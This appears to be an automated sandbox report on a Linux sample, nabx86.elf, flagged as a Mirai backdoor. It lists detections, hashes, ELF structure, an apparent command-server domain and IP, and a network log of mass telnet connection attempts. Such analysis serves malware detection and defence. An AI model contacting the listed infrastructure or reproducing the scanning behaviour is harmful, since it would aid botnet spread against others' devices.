Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1564348 Sample: nabx86.elf Startdate: 28/11/2024 Architecture: LINUX Score: 68 22 netfags.geek. [malformed] 2->22 24 216.56.19.73, 23, 33254 WISCNET1-ASUS United States 2->24 26 100 other IPs or domains 2->26 28 Malicious sample detected (through community Yara rule) 2->28 30 Multi AV Scanner detection for submitted file 2->30 32 Machine Learning detection for sample 2->32 34 Connects to many ports of the same IP (likely port scanning) 2->34 8 nabx86.elf 2->8         started        10 dash rm 2->10         started        12 dash rm 2->12         started        signatures3 36 Sends malformed DNS queries 22->36 process4 process5 14 nabx86.elf 8->14         started        process6 16 nabx86.elf 14->16         started        18 nabx86.elf 14->18         started        20 nabx86.elf 14->20         started       
SourceDetectionScannerLabelLink
nabx86.elf39%ReversingLabsLinux.Backdoor.Mirai
nabx86.elf34%VirustotalBrowse
nabx86.elf100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
burnthe.libre
154.213.187.213
truefalse
    high
    netfags.geek. [malformed]
    unknown
    unknownfalse
      high
      NameSourceMaliciousAntivirus DetectionReputation
      http:///curl.shnabx86.elffalse
        high
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        51.100.119.83
        unknownUnited States
        2686ATGS-MMD-ASUSfalse
        170.128.132.83
        unknownUnited States
        11685HNBCOL-ASUSfalse
        71.102.7.115
        unknownUnited States
        701UUNETUSfalse
        139.41.101.186
        unknownUnited States
        9905LINKNET-ID-APLinknetASNIDfalse
        33.165.164.76
        unknownUnited States
        2686ATGS-MMD-ASUSfalse
        179.199.43.8
        unknownBrazil
        7738TelemarNorteLesteSABRfalse
        77.117.114.90
        unknownAustria
        25255H3G-AUSTRIA-ASTELE2AUSTRIAATfalse
        73.19.101.47
        unknownUnited States
        7922COMCAST-7922USfalse
        3.47.234.170
        unknownUnited States
        8987AMAZONEXPANSIONGBfalse
        151.110.8.241
        unknownUnited States
        11719EATON-CORPORATIONUSfalse
        4.247.211.114
        unknownUnited States
        3356LEVEL3USfalse
        163.43.243.149
        unknownJapan9370SAKURA-BSAKURAInternetIncJPfalse
        188.207.159.176
        unknownNetherlands
        1136KPNKPNNationalEUfalse
        113.185.217.42
        unknownViet Nam
        45899VNPT-AS-VNVNPTCorpVNfalse
        197.36.129.241
        unknownEgypt
        8452TE-ASTE-ASEGfalse
        144.240.124.221
        unknownUnited States
        1239SPRINTLINKUSfalse
        36.134.233.58
        unknownChina
        56041CMNET-ZHEJIANG-APChinaMobilecommunicationscorporationCfalse
        104.232.21.166
        unknownUnited States
        46749STANFORD-INTERNET-ACCESSUSfalse
        178.220.196.176
        unknownSerbia
        8400TELEKOM-ASRSfalse
        172.226.113.114
        unknownUnited States
        16625AKAMAI-ASUSfalse
        104.133.142.153
        unknownUnited States
        36384GOOGLE-ITUSfalse
        178.115.55.179
        unknownAustria
        8437UTA-ASATfalse
        188.103.142.157
        unknownGermany
        3209VODANETInternationalIP-BackboneofVodafoneDEfalse
        117.103.7.62
        unknownIndonesia
        45300AJN-AS-IDPTAJNSolusindoIDfalse
        144.26.253.96
        unknownUnited States
        29848WCUUSfalse
        124.80.45.94
        unknownKorea Republic of
        17849GINAMHANVIT-AS-KRTbroadGinamBroadcatingCoLtdKRfalse
        181.163.133.62
        unknownChile
        7418TELEFONICACHILESACLfalse
        217.10.188.112
        unknownUnited Kingdom
        15641ARQIVAGBfalse
        30.206.136.24
        unknownUnited States
        7922COMCAST-7922USfalse
        21.156.116.55
        unknownUnited States
        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
        196.107.70.241
        unknownKenya
        33771SAFARICOM-LIMITEDKEfalse
        114.22.99.143
        unknownJapan2516KDDIKDDICORPORATIONJPfalse
        49.90.188.74
        unknownChina
        4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
        78.207.14.235
        unknownFrance
        12322PROXADFRfalse
        61.109.100.44
        unknownKorea Republic of
        17864TBROAD_HANVIT-AS-KRTBROADHANVITBROADCASTINGCOLTDKRfalse
        112.83.133.68
        unknownChina
        4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
        125.149.112.241
        unknownKorea Republic of
        4766KIXS-AS-KRKoreaTelecomKRfalse
        29.248.194.156
        unknownUnited States
        7922COMCAST-7922USfalse
        118.252.126.227
        unknownChina
        4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
        222.254.241.91
        unknownViet Nam
        45899VNPT-AS-VNVNPTCorpVNfalse
        22.61.25.146
        unknownUnited States
        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
        92.129.137.31
        unknownFrance
        3215FranceTelecom-OrangeFRfalse
        201.6.14.81
        unknownBrazil
        28573CLAROSABRfalse
        86.234.123.28
        unknownFrance
        3215FranceTelecom-OrangeFRfalse
        161.104.194.206
        unknownFrance
        7582UMAC-AS-APUniversityofMacauMOfalse
        14.206.114.229
        unknownKorea Republic of
        38701PIRANHA-AS-KRPiranhaSystemsKRfalse
        86.159.51.56
        unknownUnited Kingdom
        2856BT-UK-ASBTnetUKRegionalnetworkGBfalse
        40.187.29.100
        unknownUnited States
        4249LILLY-ASUSfalse
        104.196.145.14
        unknownUnited States
        15169GOOGLEUSfalse
        163.159.77.51
        unknownSlovenia
        15435KABELFOONDELTAFiberNederlandNLfalse
        131.235.202.21
        unknownCanada
        680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
        16.157.192.48
        unknownUnited States
        unknownunknownfalse
        144.25.65.193
        unknownUnited States
        31898ORACLE-BMC-31898USfalse
        16.215.104.197
        unknownUnited States
        unknownunknownfalse
        180.64.52.199
        unknownKorea Republic of
        9318SKB-ASSKBroadbandCoLtdKRfalse
        42.117.91.179
        unknownViet Nam
        18403FPT-AS-APTheCorporationforFinancingPromotingTechnolofalse
        47.89.129.239
        unknownUnited States
        45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
        115.19.42.175
        unknownKorea Republic of
        4766KIXS-AS-KRKoreaTelecomKRfalse
        101.26.88.179
        unknownChina
        4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
        192.30.148.79
        unknownUnited States
        393555MOITUSfalse
        47.76.95.135
        unknownUnited States
        9500VODAFONE-TRANSIT-ASVodafoneNZLtdNZfalse
        209.229.55.21
        unknownUnited States
        7029WINDSTREAMUSfalse
        9.52.85.120
        unknownUnited States
        3356LEVEL3USfalse
        124.89.94.6
        unknownChina
        4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
        20.26.232.102
        unknownUnited States
        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
        161.227.253.64
        unknownUnited States
        15173NEWMA-11USfalse
        80.5.187.186
        unknownUnited Kingdom
        5089NTLGBfalse
        96.55.74.157
        unknownCanada
        6327SHAWCAfalse
        175.255.55.162
        unknownKorea Republic of
        4766KIXS-AS-KRKoreaTelecomKRfalse
        55.158.171.174
        unknownUnited States
        1541DNIC-ASBLK-01534-01546USfalse
        15.194.86.37
        unknownUnited States
        7430TANDEMUSfalse
        47.191.145.139
        unknownUnited States
        5650FRONTIER-FRTRUSfalse
        9.190.144.57
        unknownUnited States
        3356LEVEL3USfalse
        24.103.89.198
        unknownUnited States
        12271TWC-12271-NYCUSfalse
        167.189.193.179
        unknownChina
        15071BAX-BGPUSfalse
        16.187.204.42
        unknownUnited States
        unknownunknownfalse
        146.21.151.169
        unknownSweden
        56736VASTRAGOTALANDSREGIONENSEfalse
        70.128.81.190
        unknownUnited States
        7018ATT-INTERNET4USfalse
        216.56.19.73
        unknownUnited States
        2381WISCNET1-ASUSfalse
        175.22.42.20
        unknownChina
        4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
        101.249.207.170
        unknownChina
        4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
        200.151.45.76
        unknownBrazil
        7738TelemarNorteLesteSABRfalse
        128.102.238.13
        unknownUnited States
        270AS270USfalse
        171.97.181.100
        unknownThailand
        17552TRUE-AS-APTrueInternetCoLtdTHfalse
        13.253.100.55
        unknownUnited States
        16509AMAZON-02USfalse
        194.142.193.122
        unknownFinland
        1759TSF-IP-CORETeliaFinlandOyjEUfalse
        26.158.51.172
        unknownUnited States
        7922COMCAST-7922USfalse
        104.80.225.102
        unknownUnited States
        20940AKAMAI-ASN1EUfalse
        132.119.64.243
        unknownUnited States
        306DNIC-ASBLK-00306-00371USfalse
        54.171.230.55
        unknownUnited States
        16509AMAZON-02USfalse
        180.162.225.103
        unknownChina
        4812CHINANET-SH-APChinaTelecomGroupCNfalse
        194.18.71.21
        unknownSweden
        3301TELIANET-SWEDENTeliaCompanySEfalse
        76.136.85.249
        unknownUnited States
        7922COMCAST-7922USfalse
        163.117.167.26
        unknownSpain
        766REDIRISRedIRISAutonomousSystemESfalse
        53.200.48.88
        unknownGermany
        31399DAIMLER-ASITIGNGlobalNetworkDEfalse
        171.252.46.90
        unknownViet Nam
        7552VIETEL-AS-APViettelGroupVNfalse
        14.27.29.229
        unknownChina
        4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
        128.218.193.1
        unknownUnited States
        5653UCSFUSfalse
        124.119.186.70
        unknownChina
        4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
        26.23.72.51
        unknownUnited States
        7922COMCAST-7922USfalse
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        burnthe.librenabarm5.elfGet hashmaliciousUnknownBrowse
        • 154.213.187.249
        splppc.elfGet hashmaliciousUnknownBrowse
        • 154.213.187.214
        mpsl.elfGet hashmaliciousUnknownBrowse
        • 154.213.187.242
        nabppc.elfGet hashmaliciousUnknownBrowse
        • 154.213.187.242
        ppc.elfGet hashmaliciousUnknownBrowse
        • 154.213.187.213
        sh4.elfGet hashmaliciousUnknownBrowse
        • 154.213.187.214
        nabmips.elfGet hashmaliciousUnknownBrowse
        • 154.213.187.248
        nabarm.elfGet hashmaliciousUnknownBrowse
        • 154.213.187.245
        nabarm5.elfGet hashmaliciousUnknownBrowse
        • 154.213.187.242
        zerarm5.elfGet hashmaliciousUnknownBrowse
        • 154.213.187.248
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        ATGS-MMD-ASUSnabarm5.elfGet hashmaliciousUnknownBrowse
        • 57.194.240.187
        loligang.mips.elfGet hashmaliciousMiraiBrowse
        • 57.62.215.31
        file.exeGet hashmaliciousCredential FlusherBrowse
        • 34.160.144.191
        loligang.mpsl.elfGet hashmaliciousMiraiBrowse
        • 34.56.55.83
        file.exeGet hashmaliciousCredential FlusherBrowse
        • 34.160.144.191
        botx.arm6.elfGet hashmaliciousMiraiBrowse
        • 48.180.227.197
        botx.x86.elfGet hashmaliciousMiraiBrowse
        • 32.152.252.85
        bin.sh.elfGet hashmaliciousMiraiBrowse
        • 48.157.74.54
        file.exeGet hashmaliciousCredential FlusherBrowse
        • 34.160.144.191
        file.exeGet hashmaliciousCredential FlusherBrowse
        • 34.160.144.191
        HNBCOL-ASUS.pjyhwsdgkl.elfGet hashmaliciousUnknownBrowse
        • 170.128.166.90
        mpsl.elfGet hashmaliciousMiraiBrowse
        • 170.206.222.228
        la.bot.arm.elfGet hashmaliciousUnknownBrowse
        • 170.192.221.187
        splppc.elfGet hashmaliciousUnknownBrowse
        • 170.161.32.153
        nabsh4.elfGet hashmaliciousUnknownBrowse
        • 170.193.83.108
        nabarm7.elfGet hashmaliciousUnknownBrowse
        • 170.128.3.219
        la.bot.arm7.elfGet hashmaliciousUnknownBrowse
        • 170.234.121.76
        fbot.sh4.elfGet hashmaliciousMirai, MoobotBrowse
        • 170.174.174.64
        la.bot.sh4.elfGet hashmaliciousUnknownBrowse
        • 170.136.69.94
        zgp.elfGet hashmaliciousMiraiBrowse
        • 170.226.28.153
        UUNETUSnabarm5.elfGet hashmaliciousUnknownBrowse
        • 71.103.77.250
        loligang.mips.elfGet hashmaliciousMiraiBrowse
        • 63.7.32.214
        loligang.mpsl.elfGet hashmaliciousMiraiBrowse
        • 100.4.146.245
        botx.x86.elfGet hashmaliciousMiraiBrowse
        • 108.20.244.98
        bin.sh.elfGet hashmaliciousMiraiBrowse
        • 173.69.79.11
        debug.elfGet hashmaliciousMiraiBrowse
        • 70.107.198.228
        mpsl.elfGet hashmaliciousMiraiBrowse
        • 212.153.127.10
        x86.elfGet hashmaliciousMiraiBrowse
        • 63.89.37.174
        m68k.elfGet hashmaliciousMiraiBrowse
        • 65.204.69.76
        sh4.elfGet hashmaliciousMiraiBrowse
        • 63.5.147.69
        No context
        No context
        No created / dropped files found
        File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
        Entropy (8bit):6.427926429055217
        TrID:
        • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
        • ELF Executable and Linkable format (generic) (4004/1) 49.84%
        File name:nabx86.elf
        File size:37'956 bytes
        MD5:8733d552de33f075fdd894d5b0a1ee79
        SHA1:59034bb21b4584c420305fc4b85b17c3851dfaea
        SHA256:65e2fac2aa0666a8c5ff244e1ef0f61119dc2dd9a76aa042a3fd30d9168f46cf
        SHA512:37c471691126df0cdcf0a91ac245f2c0ee50e0c8e14ce06cbe00231e66e91a97de820b8f60bce5a94e93106c455acc22361e10eb3c959d9f7c999ac453e8a34d
        SSDEEP:768:+rGBw+LVgmZJQC/QSJM7Rpq9pPoS8qd1KZ9qYKKQR:+rGBwQQSe7RpOQS8qDq9qYKKQR
        TLSH:370339459943D9B6FC5416F124BB9B72A7B1D9718475FA03EB9AD530AE02302B90F3CC
        File Content Preview:.ELF....................d...4...........4. ...(..............................................!...!..................Q.td............................U..S.......;....h....S...[]...$.............U......=`"...t..5.....!......!......u........t....h............

        ELF header

        Class:ELF32
        Data:2's complement, little endian
        Version:1 (current)
        Machine:Intel 80386
        Version Number:0x1
        Type:EXEC (Executable file)
        OS/ABI:UNIX - System V
        ABI Version:0
        Entry Point Address:0x8048164
        Flags:0x0
        ELF Header Size:52
        Program Header Offset:52
        Program Header Size:32
        Number of Program Headers:3
        Section Header Offset:37516
        Section Header Size:40
        Number of Section Headers:11
        Header String Table Index:10
        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
        NULL0x00x00x00x00x0000
        .initPROGBITS0x80480940x940x1c0x00x6AX001
        .textPROGBITS0x80480b00xb00x80760x00x6AX0016
        .finiPROGBITS0x80501260x81260x170x00x6AX001
        .rodataPROGBITS0x80501400x81400x10800x00x2A0032
        .ctorsPROGBITS0x80521c40x91c40x80x00x3WA004
        .dtorsPROGBITS0x80521cc0x91cc0x80x00x3WA004
        .jcrPROGBITS0x80521d40x91d40x40x00x3WA004
        .dataPROGBITS0x80521e40x91e40x640x00x3WA004
        .bssNOBITS0x80522600x92480x15200x00x3WA0032
        .shstrtabSTRTAB0x00x92480x430x00x0001
        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
        LOAD0x00x80480000x80480000x91c00x91c06.46690x5R E0x1000.init .text .fini .rodata
        LOAD0x91c40x80521c40x80521c40x840x15bc1.39370x6RW 0x1000.ctors .dtors .jcr .data .bss
        GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
        TimestampSource PortDest PortSource IPDest IP
        Nov 28, 2024 08:32:48.265296936 CET4171423192.168.2.2333.27.234.208
        Nov 28, 2024 08:32:48.265297890 CET3816623192.168.2.2326.23.72.51
        Nov 28, 2024 08:32:48.265325069 CET4804023192.168.2.2378.207.14.235
        Nov 28, 2024 08:32:48.265326977 CET3963023192.168.2.2321.158.166.21
        Nov 28, 2024 08:32:48.265337944 CET4169823192.168.2.2353.101.36.246
        Nov 28, 2024 08:32:48.265348911 CET5989823192.168.2.2392.129.137.31
        Nov 28, 2024 08:32:48.265348911 CET5888223192.168.2.23222.254.241.91
        Nov 28, 2024 08:32:48.265351057 CET5153423192.168.2.2380.116.204.139
        Nov 28, 2024 08:32:48.265361071 CET3623423192.168.2.2322.61.25.146
        Nov 28, 2024 08:32:48.265373945 CET3545823192.168.2.2337.45.241.143
        Nov 28, 2024 08:32:48.265392065 CET3761223192.168.2.23124.119.186.70
        Nov 28, 2024 08:32:48.265391111 CET5777223192.168.2.23171.97.181.100
        Nov 28, 2024 08:32:48.265405893 CET5526223192.168.2.23132.192.214.206
        Nov 28, 2024 08:32:48.265414000 CET5841223192.168.2.23163.159.77.51
        Nov 28, 2024 08:32:48.265425920 CET5258623192.168.2.23191.139.116.231
        Nov 28, 2024 08:32:48.265438080 CET5929623192.168.2.23175.255.55.162
        Nov 28, 2024 08:32:48.265458107 CET4351223192.168.2.23112.83.133.68
        Nov 28, 2024 08:32:48.265479088 CET3828423192.168.2.23125.115.243.69
        Nov 28, 2024 08:32:48.265479088 CET3895623192.168.2.2380.25.46.198
        Nov 28, 2024 08:32:48.265480995 CET5323823192.168.2.23172.226.113.114
        Nov 28, 2024 08:32:48.385607958 CET234171433.27.234.208192.168.2.23
        Nov 28, 2024 08:32:48.385620117 CET233816626.23.72.51192.168.2.23
        Nov 28, 2024 08:32:48.385626078 CET233963021.158.166.21192.168.2.23
        Nov 28, 2024 08:32:48.385649920 CET234804078.207.14.235192.168.2.23
        Nov 28, 2024 08:32:48.385656118 CET235989892.129.137.31192.168.2.23
        Nov 28, 2024 08:32:48.385662079 CET2358882222.254.241.91192.168.2.23
        Nov 28, 2024 08:32:48.385674953 CET234169853.101.36.246192.168.2.23
        Nov 28, 2024 08:32:48.385682106 CET233623422.61.25.146192.168.2.23
        Nov 28, 2024 08:32:48.385696888 CET4171423192.168.2.2333.27.234.208
        Nov 28, 2024 08:32:48.385696888 CET3816623192.168.2.2326.23.72.51
        Nov 28, 2024 08:32:48.385708094 CET3963023192.168.2.2321.158.166.21
        Nov 28, 2024 08:32:48.385715961 CET4804023192.168.2.2378.207.14.235
        Nov 28, 2024 08:32:48.385720968 CET5989823192.168.2.2392.129.137.31
        Nov 28, 2024 08:32:48.385721922 CET5888223192.168.2.23222.254.241.91
        Nov 28, 2024 08:32:48.385741949 CET3623423192.168.2.2322.61.25.146
        Nov 28, 2024 08:32:48.385750055 CET4169823192.168.2.2353.101.36.246
        Nov 28, 2024 08:32:48.385922909 CET235153480.116.204.139192.168.2.23
        Nov 28, 2024 08:32:48.385930061 CET233545837.45.241.143192.168.2.23
        Nov 28, 2024 08:32:48.385935068 CET2337612124.119.186.70192.168.2.23
        Nov 28, 2024 08:32:48.385982037 CET3545823192.168.2.2337.45.241.143
        Nov 28, 2024 08:32:48.386010885 CET2355262132.192.214.206192.168.2.23
        Nov 28, 2024 08:32:48.386014938 CET3761223192.168.2.23124.119.186.70
        Nov 28, 2024 08:32:48.386014938 CET5153423192.168.2.2380.116.204.139
        Nov 28, 2024 08:32:48.386017084 CET2358412163.159.77.51192.168.2.23
        Nov 28, 2024 08:32:48.386023998 CET2352586191.139.116.231192.168.2.23
        Nov 28, 2024 08:32:48.386038065 CET2359296175.255.55.162192.168.2.23
        Nov 28, 2024 08:32:48.386044025 CET2357772171.97.181.100192.168.2.23
        Nov 28, 2024 08:32:48.386050940 CET2343512112.83.133.68192.168.2.23
        Nov 28, 2024 08:32:48.386056900 CET2353238172.226.113.114192.168.2.23
        Nov 28, 2024 08:32:48.386063099 CET2338284125.115.243.69192.168.2.23
        Nov 28, 2024 08:32:48.386069059 CET233895680.25.46.198192.168.2.23
        Nov 28, 2024 08:32:48.386070967 CET5841223192.168.2.23163.159.77.51
        Nov 28, 2024 08:32:48.386091948 CET4351223192.168.2.23112.83.133.68
        Nov 28, 2024 08:32:48.386097908 CET5258623192.168.2.23191.139.116.231
        Nov 28, 2024 08:32:48.386100054 CET5526223192.168.2.23132.192.214.206
        Nov 28, 2024 08:32:48.386101961 CET5929623192.168.2.23175.255.55.162
        Nov 28, 2024 08:32:48.386109114 CET5777223192.168.2.23171.97.181.100
        Nov 28, 2024 08:32:48.386125088 CET5323823192.168.2.23172.226.113.114
        Nov 28, 2024 08:32:48.386166096 CET3828423192.168.2.23125.115.243.69
        Nov 28, 2024 08:32:48.386166096 CET3895623192.168.2.2380.25.46.198
        Nov 28, 2024 08:32:48.509602070 CET3522638241192.168.2.23154.213.187.249
        Nov 28, 2024 08:32:48.629782915 CET3824135226154.213.187.249192.168.2.23
        Nov 28, 2024 08:32:48.629935980 CET3522638241192.168.2.23154.213.187.249
        Nov 28, 2024 08:32:48.629986048 CET3522638241192.168.2.23154.213.187.249
        Nov 28, 2024 08:32:48.750055075 CET3824135226154.213.187.249192.168.2.23
        Nov 28, 2024 08:32:48.750176907 CET3522638241192.168.2.23154.213.187.249
        Nov 28, 2024 08:32:48.870318890 CET3824135226154.213.187.249192.168.2.23
        Nov 28, 2024 08:32:49.140542984 CET4433360654.171.230.55192.168.2.23
        Nov 28, 2024 08:32:49.141462088 CET33606443192.168.2.2354.171.230.55
        Nov 28, 2024 08:32:49.261594057 CET4433360654.171.230.55192.168.2.23
        Nov 28, 2024 08:32:49.573611975 CET43928443192.168.2.2391.189.91.42
        Nov 28, 2024 08:32:55.204826117 CET42836443192.168.2.2391.189.91.43
        Nov 28, 2024 08:32:56.740628958 CET4251680192.168.2.23109.202.202.202
        Nov 28, 2024 08:32:58.638308048 CET3522638241192.168.2.23154.213.187.249
        Nov 28, 2024 08:32:58.758430958 CET3824135226154.213.187.249192.168.2.23
        Nov 28, 2024 08:32:59.037770033 CET3824135226154.213.187.249192.168.2.23
        Nov 28, 2024 08:32:59.037978888 CET3522638241192.168.2.23154.213.187.249
        Nov 28, 2024 08:32:59.158004999 CET3824135226154.213.187.249192.168.2.23
        Nov 28, 2024 08:32:59.277617931 CET4171423192.168.2.2333.27.234.208
        Nov 28, 2024 08:32:59.277617931 CET3816623192.168.2.2326.23.72.51
        Nov 28, 2024 08:32:59.277656078 CET3963023192.168.2.2321.158.166.21
        Nov 28, 2024 08:32:59.277666092 CET4804023192.168.2.2378.207.14.235
        Nov 28, 2024 08:32:59.277678967 CET4169823192.168.2.2353.101.36.246
        Nov 28, 2024 08:32:59.277690887 CET5989823192.168.2.2392.129.137.31
        Nov 28, 2024 08:32:59.277690887 CET5888223192.168.2.23222.254.241.91
        Nov 28, 2024 08:32:59.277702093 CET5153423192.168.2.2380.116.204.139
        Nov 28, 2024 08:32:59.277704954 CET3623423192.168.2.2322.61.25.146
        Nov 28, 2024 08:32:59.277714014 CET3545823192.168.2.2337.45.241.143
        Nov 28, 2024 08:32:59.277734041 CET3761223192.168.2.23124.119.186.70
        Nov 28, 2024 08:32:59.277734041 CET5841223192.168.2.23163.159.77.51
        Nov 28, 2024 08:32:59.277757883 CET5526223192.168.2.23132.192.214.206
        Nov 28, 2024 08:32:59.277740955 CET5777223192.168.2.23171.97.181.100
        Nov 28, 2024 08:32:59.277784109 CET5258623192.168.2.23191.139.116.231
        Nov 28, 2024 08:32:59.277792931 CET4351223192.168.2.23112.83.133.68
        Nov 28, 2024 08:32:59.277802944 CET5323823192.168.2.23172.226.113.114
        Nov 28, 2024 08:32:59.277803898 CET5929623192.168.2.23175.255.55.162
        Nov 28, 2024 08:32:59.277827978 CET3828423192.168.2.23125.115.243.69
        Nov 28, 2024 08:32:59.277827978 CET3895623192.168.2.2380.25.46.198
        Nov 28, 2024 08:32:59.398025036 CET234171433.27.234.208192.168.2.23
        Nov 28, 2024 08:32:59.398294926 CET4171423192.168.2.2333.27.234.208
        Nov 28, 2024 08:32:59.398452997 CET233816626.23.72.51192.168.2.23
        Nov 28, 2024 08:32:59.398499966 CET233963021.158.166.21192.168.2.23
        Nov 28, 2024 08:32:59.398564100 CET234804078.207.14.235192.168.2.23
        Nov 28, 2024 08:32:59.398571014 CET3816623192.168.2.2326.23.72.51
        Nov 28, 2024 08:32:59.398580074 CET234169853.101.36.246192.168.2.23
        Nov 28, 2024 08:32:59.398591042 CET233623422.61.25.146192.168.2.23
        Nov 28, 2024 08:32:59.398608923 CET233545837.45.241.143192.168.2.23
        Nov 28, 2024 08:32:59.398619890 CET235989892.129.137.31192.168.2.23
        Nov 28, 2024 08:32:59.398627996 CET4804023192.168.2.2378.207.14.235
        Nov 28, 2024 08:32:59.398631096 CET2358882222.254.241.91192.168.2.23
        Nov 28, 2024 08:32:59.398643970 CET235153480.116.204.139192.168.2.23
        Nov 28, 2024 08:32:59.398660898 CET2337612124.119.186.70192.168.2.23
        Nov 28, 2024 08:32:59.398662090 CET3963023192.168.2.2321.158.166.21
        Nov 28, 2024 08:32:59.398683071 CET2358412163.159.77.51192.168.2.23
        Nov 28, 2024 08:32:59.398683071 CET4169823192.168.2.2353.101.36.246
        Nov 28, 2024 08:32:59.398691893 CET3623423192.168.2.2322.61.25.146
        Nov 28, 2024 08:32:59.398694038 CET2355262132.192.214.206192.168.2.23
        Nov 28, 2024 08:32:59.398698092 CET5888223192.168.2.23222.254.241.91
        Nov 28, 2024 08:32:59.398708105 CET3545823192.168.2.2337.45.241.143
        Nov 28, 2024 08:32:59.398725986 CET5989823192.168.2.2392.129.137.31
        Nov 28, 2024 08:32:59.398729086 CET5153423192.168.2.2380.116.204.139
        Nov 28, 2024 08:32:59.398729086 CET3761223192.168.2.23124.119.186.70
        Nov 28, 2024 08:32:59.398736954 CET5526223192.168.2.23132.192.214.206
        Nov 28, 2024 08:32:59.398741961 CET5841223192.168.2.23163.159.77.51
        Nov 28, 2024 08:32:59.398780107 CET2352586191.139.116.231192.168.2.23
        Nov 28, 2024 08:32:59.398789883 CET2343512112.83.133.68192.168.2.23
        Nov 28, 2024 08:32:59.398798943 CET2357772171.97.181.100192.168.2.23
        Nov 28, 2024 08:32:59.398825884 CET5258623192.168.2.23191.139.116.231
        Nov 28, 2024 08:32:59.398828983 CET4351223192.168.2.23112.83.133.68
        Nov 28, 2024 08:32:59.398854971 CET5777223192.168.2.23171.97.181.100
        Nov 28, 2024 08:32:59.399529934 CET2353238172.226.113.114192.168.2.23
        Nov 28, 2024 08:32:59.399539948 CET2359296175.255.55.162192.168.2.23
        Nov 28, 2024 08:32:59.399549007 CET2338284125.115.243.69192.168.2.23
        Nov 28, 2024 08:32:59.399558067 CET233895680.25.46.198192.168.2.23
        Nov 28, 2024 08:32:59.399569988 CET5323823192.168.2.23172.226.113.114
        Nov 28, 2024 08:32:59.399581909 CET5929623192.168.2.23175.255.55.162
        Nov 28, 2024 08:32:59.399595022 CET3828423192.168.2.23125.115.243.69
        Nov 28, 2024 08:32:59.399595022 CET3895623192.168.2.2380.25.46.198
        Nov 28, 2024 08:33:00.284200907 CET3522838241192.168.2.23154.213.187.249
        Nov 28, 2024 08:33:00.404311895 CET3824135228154.213.187.249192.168.2.23
        Nov 28, 2024 08:33:00.404366970 CET3522838241192.168.2.23154.213.187.249
        Nov 28, 2024 08:33:00.404383898 CET3522838241192.168.2.23154.213.187.249
        Nov 28, 2024 08:33:00.524338007 CET3824135228154.213.187.249192.168.2.23
        Nov 28, 2024 08:33:00.524389029 CET3522838241192.168.2.23154.213.187.249
        Nov 28, 2024 08:33:00.644301891 CET3824135228154.213.187.249192.168.2.23
        Nov 28, 2024 08:33:01.279334068 CET5118823192.168.2.2321.156.116.55
        Nov 28, 2024 08:33:01.279335022 CET5894823192.168.2.239.190.144.57
        Nov 28, 2024 08:33:01.279335022 CET5926223192.168.2.23180.162.225.103
        Nov 28, 2024 08:33:01.279351950 CET5316023192.168.2.23192.96.213.254
        Nov 28, 2024 08:33:01.279381037 CET5695423192.168.2.23194.18.71.21
        Nov 28, 2024 08:33:01.279380083 CET5557623192.168.2.2334.249.196.138
        Nov 28, 2024 08:33:01.279386997 CET5861623192.168.2.23222.177.155.202
        Nov 28, 2024 08:33:01.279396057 CET3769223192.168.2.2338.59.27.126
        Nov 28, 2024 08:33:01.279407978 CET5013423192.168.2.23170.128.132.83
        Nov 28, 2024 08:33:01.279413939 CET5958023192.168.2.2326.158.51.172
        Nov 28, 2024 08:33:01.279417992 CET5985823192.168.2.23128.102.238.13
        Nov 28, 2024 08:33:01.279418945 CET3866823192.168.2.23125.149.112.241
        Nov 28, 2024 08:33:01.279433966 CET5527423192.168.2.23159.62.91.28
        Nov 28, 2024 08:33:01.279443026 CET6090023192.168.2.23105.69.119.93
        Nov 28, 2024 08:33:01.279450893 CET5659223192.168.2.2359.127.108.19
        Nov 28, 2024 08:33:01.279459000 CET3742223192.168.2.23143.172.146.240
        Nov 28, 2024 08:33:01.279473066 CET4754023192.168.2.23175.22.42.20
        Nov 28, 2024 08:33:01.279473066 CET6075423192.168.2.23174.160.13.137
        Nov 28, 2024 08:33:01.279491901 CET3316223192.168.2.2314.206.114.229
        Nov 28, 2024 08:33:01.279529095 CET4137623192.168.2.23106.131.13.92
        Nov 28, 2024 08:33:01.400012970 CET23589489.190.144.57192.168.2.23
        Nov 28, 2024 08:33:01.400027037 CET235118821.156.116.55192.168.2.23
        Nov 28, 2024 08:33:01.400051117 CET2353160192.96.213.254192.168.2.23
        Nov 28, 2024 08:33:01.400063038 CET2359262180.162.225.103192.168.2.23
        Nov 28, 2024 08:33:01.400094032 CET2356954194.18.71.21192.168.2.23
        Nov 28, 2024 08:33:01.400114059 CET5894823192.168.2.239.190.144.57
